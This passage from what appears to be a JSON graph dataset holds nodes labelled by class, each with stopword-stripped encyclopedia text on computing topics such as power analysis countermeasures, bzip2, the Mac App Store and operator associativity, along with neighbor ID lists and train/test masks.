attacks widely available example digital storage oscilloscopes provide necessary data collection functionality data analysis typically performed using conventional pcs commercial products designed testing labs also available power analysis attacks generally detected device since adversary monitoring normally passive addition attack non-invasive result physical enclosures auditing capabilities attack detectors ineffective instead cryptosystem engineers must ensure devices power variations reveal information usable adversaries simple power analysis easily distinguish outcome conditional branches execution cryptographic software since device different things consuming different power depending whether conditional branch taken reason care taken ensure secret values affect conditional branches within cryptographic software implementations sources variation microcode differences branches introduced compilers power consumption variations multipliers also commonly lead spa vulnerabilities differential power analysis difficult prevent since even small biases power consumption lead exploitable weaknesses countermeasure strategies involve algorithmic modifications cryptographic operations occur data related actual value mathematical relationship survives cryptographic operation one approach involves blinding parameters randomize value countermeasure strategies reduce effectiveness dpa attacks involve hardware modifications varying chip internal clock frequency considered desynchronize electric signals lead return algorithmic enhancements traditional dpa many techniques prevent spa dpa attacks proposed academic literature public key systems like rsa typically protected exploiting properties underlying algebraic structures case rsa would multiplicatively homomorphic property symmetrically keyed primitives like blockciphers require different methods e.g. masking companies like rambus claim intellectual property dpa defense mechanisms",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      7056,
      9745,
      658,
      660,
      1173,
      1941,
      4389,
      10662,
      11432,
      169,
      3882,
      11185,
      2357,
      10806,
      9528,
      7354,
      9541,
      10315,
      6863,
      8273,
      10963,
      212,
      9556,
      11349,
      2265,
      7643,
      9697,
      618,
      1898,
      881,
      1654,
      7161,
      7034,
      892
    ],
    "mask": "Train"
  },
  {
    "node_id": 230,
    "label": 9,
    "text": "Strictness_analysis:strictness analysis computer science strictness analysis refers algorithm used prove function non-strict functional programming language strict one arguments information useful compilers strict functions compiled efficiently thus function proven strict using strictness analysis compile time compiled use efficient calling convention without changing meaning enclosing program note function codice_1 said diverge returns formula_1 operationally would mean codice_1 either causes abnormal termination enclosing program e.g. failure error message loops infinitely notion divergence significant strict function one always diverges given argument diverges whereas lazy non-strict function one may may diverge given argument strictness analysis attempts determine divergence properties functions thus identifies functions strict strictness analysis characterized forward abstract interpretation approximates function program function maps divergence properties arguments onto divergence properties results classical approach pioneered alan mycroft abstract interpretation used two-point domain 0 denoting set formula_1 considered subset argument return type 1 denoting values type glasgow haskell compiler ghc uses backward abstract interpretation known demand analysis perform strictness analysis well program analyses demand analysis function modelled function value demands result value demands arguments function strict argument demand result leads demand argument projection-based strictness analysis introduced philip wadler r.j.m hughes uses strictness projections model subtle forms strictness head-strictness list argument contrast ghc demand analysis model strictness within product types i.e. datatypes single constructor function formula_3 considered head-strict formula_4 formula_5 projection head-evaluates list argument large body research strictness analysis 1980s",
    "neighbors": [
      1952,
      8738,
      6536,
      4392,
      8722,
      2682
    ],
    "mask": "Validation"
  },
  {
    "node_id": 231,
    "label": 2,
    "text": "App_Store_(macOS):app store macos app store also known mac app store digital distribution platform macos apps created maintained apple inc platform announced october 20 2010 apple back mac event apple began accepting app submissions registered developers november 3 2010 preparation launch mac app store launched january 6 2011 part free mac os x 10.6.6 update current snow leopard users 24 hours release apple announced one million downloads june 4 2018 apple announced new version app store would included macos mojave like app store ios mac app store regulated apple submit app consideration developer must member apple developer program june 2019 membership fee us 99 year apps must approved apple becoming available store disallowed types apps revealed apple include apps ios app store apple rates applications worldwide based content determines age group appropriate macos allow blocking objectionable apps system preferences following ratings apple detailed since opening mac app store apple increasingly used primary means distribution in-house software products expense boxed versions sold retail stores position increased july 2011 release os x lion first release os x sold form dvd boxes method limited reach distribution operating system currently use mac os x 10.6.6+ although means offered apple release included usb flash drive containing operating system digital in-store download operating system apple store locations starting os x mountain lion apple ’ operating systems downloaded mac app store however apple still sells mac os x snow leopard dvds june 2019 owners older macs get mac app store upgrade latest available version also affected apple prior means distribution website downloads gallery removed july 2011 replaced links mac app store information page however affected dashboard widget gallery affected safari extensions gallery remain online web-based however safari 12 old kind extensions deprecated replaced new safe one available exclusively mac app store apple support download section also remains online provides mostly security updates current older software applications operating systems many dating back 1998 long independent game developer wolfire games placed game lugaru mac app store lugaru hd 9.99 developer noticed counterfeit copy game also sold app store 0.99 usd developer contacted apple january 31 2011 february 10 2011 counterfeit copy game removed app store number news sites remarked scrutiny apple places apps listed store counterfeit copy existing app made process days since developer alerted apple counterfeit software disconcerting developers mac app store launched 1000 apps january 6 2011 including apple iwork '09 ilife '11 aperture third-party applications ported ios angry birds flight control things twitter mac apps belonged games category nearly three times many apps next largest category utilities common price point 20–50 angry birds popular video game ios app store number one paid app mac app store first day update mac app store os x mountain lion introduced easter egg one downloads app mac app store goes one app folder app finished downloading one see app timestamp january 24 1984 2:00 date original macintosh went sale first time easter egg appeared piece apple software since steve jobs declared ban easter eggs ’ returned apple 1997 november 11 2015 number apps purchased mac app store began fail launch users worldwide got error messages forced delete re-download affected apps discovered next day tapbots developer paul haddad issue expired security certificate november 17 apple sent email explanations developers company stated issues resolved troubleshooting information provided applecare support team december 17 2015 responsibility overseeing app store given phil schiller apple senior vice president worldwide marketing previously app store led eddy cue apple senior vice president internet software services january 1 2018 apple announced longer accepting 32-bit apps mac app store existing 32-bit apps app store must updated fit 64-bit architecture june 1 2018",
    "neighbors": [
      10755,
      9732,
      4615,
      10760,
      1549,
      5647,
      7697,
      1042,
      8213,
      6680,
      11289,
      9245,
      10270,
      5155,
      5670,
      6186,
      7722,
      6700,
      5677,
      9262,
      4657,
      1074,
      9784,
      8253,
      576,
      10817,
      9802,
      8783,
      3152,
      5713,
      3667,
      4180,
      6227,
      3670,
      10838,
      4184,
      2141,
      4702,
      9826,
      2149,
      5733,
      8806,
      3691,
      9324,
      8303,
      1138,
      6771,
      2676,
      2168,
      6264,
      9337,
      7293,
      2686,
      6783,
      7806,
      9343,
      10368,
      10878,
      3719,
      10888,
      8842,
      11402,
      6797,
      8852,
      10900,
      1686,
      7318,
      5784,
      1177,
      10394,
      4251,
      3228,
      2207,
      1699,
      11430,
      4775,
      171,
      5292,
      6828,
      1710,
      2735,
      3248,
      8877,
      3766,
      2232,
      9912,
      4283,
      5819,
      7869,
      190,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      4302,
      7378,
      2259,
      4309,
      3286,
      9430,
      3289,
      6361,
      3293,
      4318,
      8413,
      741,
      6375,
      2281,
      2282,
      9451,
      1772,
      4844,
      10478,
      2288,
      7928,
      6393,
      8441,
      11000,
      7422,
      11521,
      2819,
      1796,
      11525,
      1290,
      7435,
      7947,
      9487,
      784,
      9999,
      10512,
      788,
      1813,
      5397,
      4888,
      8476,
      11037,
      9508,
      10023,
      811,
      3371,
      6446,
      4399,
      7983,
      1842,
      10036,
      823,
      2872,
      9529,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      4933,
      838,
      9035,
      3918,
      2388,
      1878,
      4951,
      9564,
      6495,
      2401,
      9569,
      1379,
      9063,
      4457,
      8554,
      10602,
      3948,
      4972,
      11629,
      10096,
      10608,
      8068,
      9605,
      3462,
      6023,
      8582,
      2955,
      6539,
      9100,
      1428,
      9109,
      3483,
      1439,
      2979,
      9123,
      11173,
      8109,
      6583,
      2492,
      10172,
      446,
      7614,
      9151,
      11198,
      8644,
      2502,
      9671,
      456,
      1482,
      5067,
      5578,
      6093,
      5070,
      463,
      464,
      6608,
      7118,
      8662,
      9174,
      2010,
      3035,
      4571,
      7133,
      9182,
      4068,
      5093,
      7140,
      487,
      488,
      2023,
      5096,
      6119,
      5612,
      8170,
      10221,
      1522,
      5619,
      7154,
      3573,
      11257,
      7163,
      8700,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 232,
    "label": 4,
    "text": "Metech_Incorporated:metech incorporated metech recycling united states-based electronics recycling asset recovery services company metech recycling resulted merger metech international guaranteed recycling xperts 2009 company places emphasis environmentally responsible recycling",
    "neighbors": [
      3880,
      7579,
      11368
    ],
    "mask": "Test"
  },
  {
    "node_id": 233,
    "label": 3,
    "text": "List_of_Linux_kernel_names:list linux kernel names linux 1.2 kernels include name makefile source trees found git repository",
    "neighbors": [
      4616,
      3082,
      5139,
      10780,
      10785,
      6180,
      8242,
      9266,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      7403,
      10482,
      2294,
      8439,
      2809,
      4360,
      1291,
      4367,
      792,
      10016,
      295,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      11095,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      1972,
      9667,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 234,
    "label": 8,
    "text": "Mod_deflate:mod deflate mod_deflate optional module apache http server apache v2.0 later based deflate lossless data compression algorithm uses combination lz77 algorithm huffman coding module provides deflate output filter allows output apache http server compressed sent client network also provides filter decompressing inflating uncompressing gzip compressed response body mod_deflate module lower bound file size attempts compress files small benefit compression results files smaller approximately 120 bytes becoming larger processed mod_deflate check server see sending compressed data compression compatibility browser example textual content compressed using mod_gzip maintain mime-type according recommended media type mod_gzip module similar mod_deflate apache v1 v2 mod_gz module independently developed ian holsman module implements gzip compression filter apache 2.0 providing similar functionality mod_gzip one important difference two modules mod_gzip includes gzip implementation whereas mod_gz relies external zlib library php similar effect achievable output php scripts cherrypy offers gzip filter uses zlib module python standard library mod_deflate module part apache v2 licensed apache license 2.0 module level content compression apache started mod_gzip external extension module since apache 1.3 developers apache 2.0.x servers included mod_deflate codebase server perform similar gzip-encoding function early versions provided lesser amount compression mod_gzip starting apache 2.0.45 compression level mod_deflate configurable using deflatecompressionlevel directive directive accepts values 1 fastest compression speed lowest compression ratio 9 slowest compression speed highest compression ratio default value 6 change made compression mod_deflate comparable mod_gzip box",
    "neighbors": [
      865,
      8644,
      4490,
      1583,
      4561,
      11668
    ],
    "mask": "Validation"
  },
  {
    "node_id": 235,
    "label": 8,
    "text": "Quantcast:quantcast quantcast american technology company founded 2006 specializes ai-driven real-time advertising audience insights measurement company claims accurate audience measurement 100 million web destinations offices united states canada australia singapore united kingdom ireland france germany italy sweden quantcast launched 2006 company claimed first rating service rely largely direct measurement opposed traditional panel based method pioneered nielsen company built belief digital advertising requires reliable data successful initially primary aim gather detailed real-time insights audience characteristics across internet placing tags digital content across open internet firm measures metrics audience age gender makeup areas interest type length frequency engagement certain types content private information made publicly available used marketers publishers accurately understand audience granular detail 2009 quantcast launched real-time advertising side business using insight human behavior received direct measurement audiences 2010 quantcast publisher program first syndicated online traffic measurement service receive official accreditation media rating council mrc 2013 company acquired makegood software advertising technology startup simplifies data management reporting online advertising campaigns technology subsequently integrated quantcast advertise enhance reporting functions available quantcast campaigns nudged company closer towards competition ad effectiveness category includes companies like comscore",
    "neighbors": [
      6435,
      5607,
      3688,
      10450,
      1943,
      735
    ],
    "mask": "Test"
  },
  {
    "node_id": 236,
    "label": 7,
    "text": "Google_Photos:google photos google photos photo sharing storage service developed google announced may 2015 separated google+ company social network google photos gives users free unlimited storage photos 16 megapixels videos 1080p resolution service automatically analyzes photos identifying various visual features subjects users search anything photos service returning results three major categories people places things google photos recognizes faces grouping similar ones together feature available certain countries due privacy laws geographic landmarks eiffel tower subject matter including birthdays buildings animals food different forms machine learning photos service allow recognition photo contents automatically generate albums animate similar photos quick videos surface past memories significant times improve quality photos videos may 2017 google announced several updates google photos including reminders suggested sharing photos shared photo libraries two users physical albums photos automatically suggesting collections based face location trip distinction google photos acts back photos sent google terms 'shared common backup tool photos shared social media platforms apps google photos received critical acclaim decoupling google+ 2015 reviewers liked updated photos service recognition technology search apps loading times nevertheless privacy concerns raised including google motivation building service well relationship governments possible laws requiring google hand user entire photo history google photos seen strong user adoption reached 100 million users five months 200 million one year 500 million may 2017 google announcing 1.2 billion photos uploaded service every day grand total uploaded content measuring 13.7 petabytes storage comparison end 2017 entire internet archive held almost 40 petabytes service apps android ios operating systems website users back photos cloud service become accessible devices photos service analyzes organizes images groups identify features beaches skylines snowstorm toronto application search window users shown potential searches groups photos three major categories people places things service analyzes photos similar faces groups together people category also track faces age places category uses geotagging data also determine locations older pictures analyzing major landmarks e.g. photos containing eiffel tower things category processes photos subject matter birthdays buildings cats concerts food graduations posters screenshots etc users manually remove categorization errors recipients shared images view web galleries without needing download app users swipe fingers across screen adjust service photo editing settings opposed using sliders images easily shared social networks google+ facebook twitter services application generates web links google photos users non-users access google photos two storage settings high quality original quality high quality includes unlimited photo video storage photos 16 megapixels videos 1080p resolution maximum resolutions average smartphone users 2015 original quality preserves original resolution quality photos videos uses storage quantity users google account google pixel phones pixel 3a google photos offers unlimited storage original quality free december 2015 google added shared albums google photos users pool photos videos album share album google photos users recipient join add photos videos also get notifications new pics added users also save photos videos shared albums add private collection unlike native photos service within ios google photos permits full resolution sharing across android ios platforms two june 2016 google updated photos include automatically generated albums event trip photos group best photos together suggest creating album alongside maps show geographic travel location pins exact places users also add text captions describe photos october google announced multiple significant updates google photos surface old memories people identified users recent photos occasionally highlight best photos user recently taken lot images specific subject make animations videos well photos photo animations present since start displaying memorable moments videos find sideways photos help user easily flip normal orientation features google touts machine learning work user interaction required november google released separate app photoscan users scan printed photos service app released ios android uses scanning process users must center camera four dots overlay printed image software combine photographs high resolution digital image fewest possible defects later month google added deep blue slider feature lets users change color saturation skies without degrading image quality inadvertently changing colors objects elements photos february 2017 google updated albums tab android app include three separate sections one phone camera roll different views sorting options people location another photos taken inside apps third actual photo albums march google added automatic white balance feature service android app website first receive feature later rollout ios app later march updates service enabled uploading photos lightweight preview quality immediate viewing slow cellular networks higher-quality upload later faster wi-fi feature also extends sharing photos low-resolution image sent updated higher-quality version april google added video stabilization feature creates duplicate video avoid overwriting original clip may 2017 google announced several updates google photos suggested sharing reminds users share captured photos fact also groups photos based faces suggests recipients based facial recognition shared libraries lets two users share central repository photos specific categories images photo books physical collections photos offered either softcover hardcover albums photos automatically suggesting collections based face location trip distinction towards end month google introduced archive feature lets users hide photos main timeline view without deleting archived content still appears relevant albums search june new sharing features announced may began rolling users december 2018 google doubled number photos videos users store private google photos live album number increased 10,000 20,000 photos equivalent capacity shared albums google photos standalone successor photo features previously embedded google+ company social network google launched social network compete facebook service never became popular facebook remained internet preferred website social networking photo sharing google+ however offered photo storage organizational tools surpassed facebook power though google+ lacked user base use leaving social network affiliation photos service changed association sharing platform private library platform february 12 2016 google announced picasa desktop application would discontinued march 15 2016 followed closure picasa web albums service may 1 2016 google stated primary reason retiring picasa wanted focus efforts entirely single photo service cross-platform web-based google photos october 2015 five months launch service google announced google photos 100 million users uploaded 3.72 petabytes photos videos may 2016 one year release google photos google announced service 200 million monthly active users statistics revealed least 13.7 petabytes photos/videos uploaded 2 trillion labels applied 24 billion selfies 1.6 billion animations collages effects created based user content may 2017 google announced google photos 500 million users upload 1.2 billion photos every day may 2015 release google photos reviewers wrote service among best kind walt mossberg recode declared service best cloud photo storage competition amazon amazon drive apple icloud dropbox microsoft onedrive jacob kastrenakes verge wrote release made google major competitor photo storage market pricing structure obsoleted idea paying photo storage sarah mitroff lynn la cnet wrote service phone tablet apps particularly good google photos streamlined design yahoo flickr organizing features apple icloud photo service kastrenakes described service may 2015 release evidence google spinning best features google+ social network stated photos service always excellent liked users would able use service without signing new social network mossberg described release liberation day photos features effectively hidden widely ignored social network service strategy described josh lowensohn verge put data google servers accessed universally mossberg liked service search function writing search massachusetts instantly brought loads photos subjects lowensohn noted service speed intelligence especially ability sort unorganized photos well photo loading times search speeds simple photo editing tools kastrenakes compared service new image analysis technology unveiled flickr earlier month mossberg thought face grouping feature remarkably accurate impressed subject-based grouping surprised search boats found cape cod fishing boats venetian gondolas also noted errors professional photograph registering screenshot pc magazine john c. dvorak concerned service privacy particularly concerned google motivation building service company relationships existing governments potential laws would require google provide user entire history photos upon request dvorak compared scenario inviting others scrounge underwear drawer criticized service sync functions preferred folders images unsorted flat database dvorak also highlighted service poor choice photos animate lack longevity guarantees considering company abrupt cancellation google reader ultimately suggested users instead use portable hard drive considered safer cheap",
    "neighbors": [
      4096,
      4623,
      3600,
      8719,
      7700,
      9244,
      8735,
      10284,
      3633,
      1083,
      4683,
      11343,
      3664,
      1623,
      8285,
      2658,
      8821,
      7816,
      5262,
      6800,
      11408,
      10393,
      8858,
      7841,
      1203,
      7359,
      196,
      3269,
      3782,
      10445,
      3795,
      1240,
      8413,
      9949,
      6367,
      9970,
      7926,
      3836,
      8446,
      5892,
      8455,
      10009,
      3355,
      10525,
      798,
      288,
      4901,
      7983,
      5431,
      2875,
      10045,
      11590,
      11592,
      9039,
      3409,
      9063,
      5483,
      7548,
      1409,
      4995,
      9610,
      5522,
      1427,
      5524,
      10645,
      1435,
      2978,
      6565,
      1959,
      3499,
      7595,
      10185,
      4044,
      4048,
      488,
      6632,
      5100,
      9712
    ],
    "mask": "Test"
  },
  {
    "node_id": 237,
    "label": 6,
    "text": "Bzip2:bzip2 bzip2 free open-source file compression program uses burrows–wheeler algorithm compresses single files file archiver developed julian seward maintained federico mena seward made first public release bzip2 version 0.15 july 1996 compressor stability popularity grew next several years seward released version 1.0 late 2000 following nine year hiatus updates project since 2010 june 4 2019 federico mena accepted maintainership bzip2 project bzip2 compresses files effectively older lzw .z deflate .zip .gz compression algorithms considerably slower lzma generally space-efficient bzip2 expense even slower compression speed much faster decompression bzip2 compresses data blocks size 100 900 kb uses burrows–wheeler transform convert frequently-recurring character sequences strings identical letters applies move-to-front transform huffman coding bzip2 ancestor bzip used arithmetic coding instead huffman change made software patent restriction bzip2 performance asymmetric decompression relatively fast motivated large cpu time required compression modified version created 2003 called pbzip2 supported multi-threading giving almost linear speed improvements multi-cpu multi-core computers functionality incorporated main project like gzip bzip2 data compressor archiver like tar zip program facilities multiple files encryption archive-splitting unix tradition relies instead separate external utilities tar gnupg tasks bzip2 uses several layers compression techniques stacked top occur following order compression reverse order decompression sequence 4 255 consecutive duplicate symbols replaced first four symbols repeat length 0 251 thus sequence codice_1 replaced codice_2 codice_3 codice_4 represent byte values 3 0 respectively runs symbols always transformed four consecutive symbols even run-length set zero keep transformation reversible worst case cause expansion 1.25 best case reduction 0.02 specification theoretically allows runs length 256–259 encoded reference encoder produce output author bzip2 stated rle step historical mistake intended protect original bwt implementation pathological cases reversible block-sort core bzip2 block entirely self-contained input output buffers remaining size—in bzip2 operating limit stage block-sort notional matrix created row formula_1 contains whole buffer rotated start formula_2 symbol following rotation rows matrix sorted alphabetic numerical order 24-bit pointer stored marking starting position block untransformed practice necessary construct full matrix rather sort performed using pointers position buffer output buffer last column matrix contains whole buffer reordered likely contain large runs identical symbols transform alter size processed block symbols use document placed array symbol processed replaced location index array symbol shuffled front array effect immediately recurring symbols replaced zero symbols long runs arbitrary symbol thus become runs zero symbols symbols remapped according local frequency much natural data contains identical symbols recur within limited range text good example mtf transform assigns low values symbols reappear frequently results data stream contains many symbols low integer range many identical different recurring input symbols actually map output symbol data efficiently encoded legacy compression method long strings zeros output move-to-front transform come repeated symbols output bwt replaced sequence two special codes runa runb represent run-length binary number actual zeros never encoded output lone zero becomes runa step fact done time mtf whenever mtf would produce zero instead increases counter encode runa runb sequence codice_5 would represented codice_6 codice_7 represents value 5 described run-length code terminated reaching another normal symbol rle process flexible initial rle step able encode arbitrarily long integers practice usually limited block size step encode run 900,000 bytes run-length encoded fashion assigning place values 1 first bit 2 second 4 third etc sequence multiply place value runb spot 2 add resulting place values runa runb values alike together similar base-2 bijective numeration thus sequence codice_7 results value 1 2 × 2 5 complicated example process replaces fixed length symbols range 0–258 variable length codes based frequency use frequently used codes end shorter 2–3 bits whilst rare codes allocated 20 bits codes selected carefully sequence bits confused different code end-of-stream code particularly interesting n different bytes symbols used uncompressed data huffman code consist two rle codes runa runb n − 1 symbol codes one end-of-stream code combined result mtf rle encodings previous two steps never need explicitly reference first symbol mtf table would zero ordinary mtf thus saving one symbol end-of-stream marker explaining n − 1 symbols coded huffman tree extreme case one symbol used uncompressed data symbol codes huffman tree entire block consist runa runb implicitly repeating single byte end-of-stream marker value 2 several identically-sized huffman tables used block gain using greater cost including extra table least two 2 six 6 tables present appropriate table reselected every 50 symbols processed advantage responsive huffman dynamics without continuously supply new tables would required deflate run-length encoding previous step designed take care codes inverse probability use higher shortest code huffman code use multiple huffman tables use selection table numbered 0 5 done list zero-terminated bit run one 1 six 6 bits length selection mtf list tables using feature results maximum expansion around 1.015 generally less expansion likely greatly over-shadowed advantage selecting appropriate huffman tables common-case continuing use huffman table represented single bit rather unary encoding effectively extreme form huffman tree code half probability previous code huffman code bit-lengths required reconstruct used canonical huffman tables bit-length stored encoded difference previous code bit-length zero-bit 0 means previous bit-length duplicated current code whilst one-bit 1 means bit read bit-length incremented decremented based value common case single bit used per symbol per table worst case—going length one 1 length twenty 20 —would require approximately 37 bits result earlier mtf encoding code lengths would start 2–3 bits long frequently used codes gradually increase meaning delta format fairly efficient—requiring around 300 bits 38 bytes per full huffman table bitmap used show symbols used inside block included huffman trees binary data likely use 256 symbols representable byte whereas textual data may use small subset available values perhaps covering ascii range 32 126 storing 256 zero bits would inefficient mostly unused sparse method used 256 symbols divided 16 ranges symbols used within block 16-bit array included presence 16 ranges indicated additional 16-bit bit array front total bitmap uses 32 272 bits storage 4–34 bytes contrast deflate algorithm would show absence symbols encoding symbols zero bit-length run length encoding additional huffman coding formal specification bzip2 exists although informal specification reverse engineered reference implementation overview codice_9 stream consists 4-byte header followed zero compressed blocks immediately followed end-of-stream marker containing 32-bit crc plaintext whole stream processed compressed blocks bit-aligned padding occurs first-stage rle compression see maximum length plaintext single 900 kb bzip2 block contain around 46 mb 45,899,236 bytes occur whole plaintext consists entirely repeated values resulting codice_9 file case 46 bytes long even smaller file 40 bytes achieved using input containing entirely values 251 apparent compression ratio 1147480.9:1 compressed blocks bzip2 independently decompressed without process earlier blocks means bzip2 files decompressed parallel making good format use big data applications cluster computing frameworks like hadoop apache spark addition julian seward original reference implementation following programs support bzip2 format",
    "neighbors": [
      2432,
      3969,
      2050,
      9988,
      6022,
      10121,
      1420,
      1940,
      3222,
      9880,
      546,
      9507,
      10149,
      4775,
      3114,
      10027,
      2095,
      2864,
      7983,
      950,
      4406,
      6713,
      11322,
      6587,
      576,
      1089,
      10817,
      2755,
      11076,
      965,
      1352,
      4296,
      2762,
      3659,
      1101,
      4174,
      8909,
      10317,
      3921,
      722,
      4561,
      8147,
      2389,
      10575,
      9177,
      10971,
      3804,
      7422,
      1631,
      3296,
      9953,
      5858,
      10851,
      8676,
      10857,
      11614,
      6759,
      5096,
      7529,
      8554,
      4459,
      5612,
      4845,
      1646,
      8810,
      8940,
      9320,
      10732,
      7667,
      3573,
      1782,
      6389,
      4089,
      894,
      10623
    ],
    "mask": "Test"
  },
  {
    "node_id": 238,
    "label": 2,
    "text": "Peer_Name_Resolution_Protocol:peer name resolution protocol peer name resolution protocol pnrp peer-to-peer protocol designed microsoft pnrp enables dynamic name publication resolution requires ipv6 pnrp first mentioned presentation p2p conference november 2001 appeared july 2003 advanced networking pack windows xp later included service pack 2 windows xp pnrp 2.0 introduced windows vista available download windows xp service pack 2 users pnrp 2.1 included windows vista sp1 windows server 2008 windows xp sp3 pnrp v2 available windows xp professional x64 edition edition windows server 2003 windows remote assistance windows 7 uses pnrp teredo ipv6 connecting using easy connect option design pnrp covered us patent 7,065,587 issued june 20 2006 pnrp distributed name resolution protocol allowing internet hosts publish peer names corresponding ipv6 addresses optionally information hosts resolve peer name retrieve corresponding addresses information establish peer-to-peer connections pnrp peer names composed authority qualifier authority identified secure hash associated public key place-holder number zero peer name unsecured qualifier string allowing authority different peer names different services peer name secure pnrp name records signed publishing authority verified using public key unsecured peer names published anybody without possible verification multiple entities publish peer name example peer name associated group group member publish addresses peer name peer names published resolved within specified scope scope local link site e.g campus whole internet internally pnrp uses architecture similar distributed hash table systems chord pastry peer name hashed produce 128-bit peer identifier dht-like algorithm used retrieve location host publishing identifier however significant differences dht systems like chord pastry store indices objects hashes node whose identifier closest hash routing algorithm designed find node contrast pnrp always store hash node publishes identifier node thus many entries routing system number identifiers publishes pnrp design arguably trades increased security robustness higher routing cost dht systems assume one node publishes specific index contrast pnrp allows multiple hosts publish name internal index fact composed 128-bit hash peer name 128-bit location identifier derived ipv6 address node pnrp use routing table rather cache pnrp entries new cache entries acquired side effect ongoing traffic cache maintenance algorithm ensures node maintains adequate knowledge cloud designed ensure time resolve request varies logarithm size cloud",
    "neighbors": [
      8640,
      8674,
      7908,
      8391,
      1098,
      4074,
      8238,
      8080,
      9620,
      5470
    ],
    "mask": "Test"
  },
  {
    "node_id": 239,
    "label": 4,
    "text": "Human–computer_interaction_(security):human–computer interaction security hcisec study interaction humans computers human–computer interaction specifically pertains information security aim plain terms improve usability security features end user applications unlike hci roots early days xerox parc 1970s hcisec nascent field study comparison interest topic tracks internet security become area broad public concern recent years security features exhibit poor usability following common reasons",
    "neighbors": [
      5325,
      5373,
      3941,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 240,
    "label": 9,
    "text": "Operator_associativity:operator associativity programming languages associativity operator property determines operators precedence grouped absence parentheses operand preceded followed operators example codice_1 operators equal precedence operand may used input two different operations i.e two operations indicated two operators choice operations apply operand determined associativity operators operators may associative meaning operations grouped arbitrarily left-associative meaning operations grouped left right-associative meaning operations grouped right non-associative meaning operations chained often output type incompatible input types associativity precedence operator part definition programming language different programming languages may different associativity precedence type operator consider expression codice_2 operator codice_3 left associativity expression would interpreted codice_4 operator right associativity expression would interpreted codice_5 operator non-associative expression might syntax error might special meaning mathematical operators inherent associativity example subtraction division used conventional math notation inherently left-associative addition multiplication contrast left right associative e.g codice_6 many programming language manuals provide table operator precedence associativity see example table c c++ concept notational associativity described related different mathematical associativity operation mathematically associative definition requires notational associativity example addition associative property therefore either left associative right associative operation mathematically associative however must notationally left- right- non-associative example subtraction associative property therefore must notational associativity associativity needed operators expression precedence usually codice_7 codice_8 precedence consider expression codice_9 result could either codice_10 codice_11 former result corresponds case codice_7 codice_13 left-associative latter codice_7 codice_8 right-associative order reflect normal usage addition subtraction multiplication division operators usually left-associative exponentiation operator present knuth up-arrow operators general agreement assignment operators typically right-associative prevent cases operands would associated two operators operator operators precedence must associativity consider expression codice_16 codice_17 right-associative exponentiation operator parser reading tokens left right would apply associativity rule branch right-associativity codice_17 following way evaluated depth-first starting top node first codice_17 left-associative evaluation would resulted parse tree codice_37 completely different results 625 244140625 finally ~5.9604645 × 10 many imperative programming languages assignment operator defined right-associative assignment defined expression value statement allows chained assignment using value one assignment expression input right operand next example c assignment codice_38 expression returns value namely codice_39 converted type codice_40 side effect setting codice_40 value assignment performed middle expression right-associativity codice_42 operator allows expressions codice_43 interpreted codice_44 thereby setting codice_40 codice_39 value codice_47 c alternative codice_48 make sense codice_38 l-value r-value however c++ assignment codice_38 returns value referring left term assignment therefore codice_48 interpreted codice_52 non-associative operators operators defined behavior used sequence expression prolog infix operator codice_53 non-associative constructs codice_54 constitute syntax errors another possibility sequences certain operators interpreted way expressed associativity generally means syntactically special rule sequences operations semantically behavior different good example python several constructs since assignments statements operations assignment operator value associative chained assignment instead implemented grammar rule sequences assignments codice_43 assigned left-to-right combinations assignment augmented assignment like codice_56 legal python though legal c. another example comparison operators codice_57 codice_58 codice_59 chained comparison like codice_60 interpreted codice_61 equivalent either codice_62 codice_63",
    "neighbors": [
      8385,
      7076,
      805,
      8554,
      10571,
      8143,
      6160,
      3767,
      10555,
      7612,
      2045,
      10143
    ],
    "mask": "Test"
  },
  {
    "node_id": 241,
    "label": 4,
    "text": "CoSign_single_sign_on:cosign single sign cosign open-source project originally designed research systems unix group provide university michigan secure single sign-on web authentication system cosign authenticates user web server provides environment variable user name user accesses part site requires authentication presence variable allows access without sign cosign part national science foundation middleware initiative nmi edit software release",
    "neighbors": [
      5433,
      5612,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 242,
    "label": 2,
    "text": "Object-oriented_operating_system:object-oriented operating system object-oriented operating system operating system uses object-oriented design principles object-oriented operating system contrast object-oriented user interface programming framework run atop non-object-oriented operating system like dos unix already object-based language concepts involved design typical operating system unix traditional language like c support object-orientation fluidly recent languages notion example file stream device driver unix represented file descriptor considered good example objects abstract data types various methods form system calls whose behavior varies based type object whose implementation details hidden caller object-orientation defined objects inheritance inheritance one approach general problem delegation occurs every operating system object-orientation widely used user interfaces operating systems kernels object instance class provides certain set functionalities two objects differentiated based functionalities methods support operating system context objects associated resource historically object-oriented design principles used operating systems provide several protection mechanisms protection mechanisms operating system help providing clear separation different user programs also protects operating system malicious user program behavior example consider case user profiles operating system user access resources another user object model deals protection issues resource acting object every object perform set operations context user profiles set operations limited privilege level user present-day operating systems use object-oriented design principles many components system includes protection",
    "neighbors": [
      10757,
      2062,
      6675,
      7187,
      10776,
      25,
      4637,
      3102,
      9762,
      5158,
      5677,
      7727,
      7217,
      9784,
      10809,
      576,
      9286,
      6730,
      10333,
      97,
      8298,
      9330,
      7285,
      119,
      2168,
      9335,
      5754,
      1147,
      3197,
      1150,
      7806,
      2179,
      10883,
      7307,
      6797,
      2193,
      9877,
      9366,
      6296,
      6813,
      7325,
      9887,
      3235,
      3248,
      6837,
      9921,
      8388,
      7880,
      9932,
      5840,
      7382,
      8410,
      1253,
      10470,
      2282,
      9964,
      1776,
      5360,
      5872,
      5363,
      2811,
      3323,
      10499,
      1804,
      8976,
      273,
      11539,
      11030,
      1304,
      8473,
      10016,
      10024,
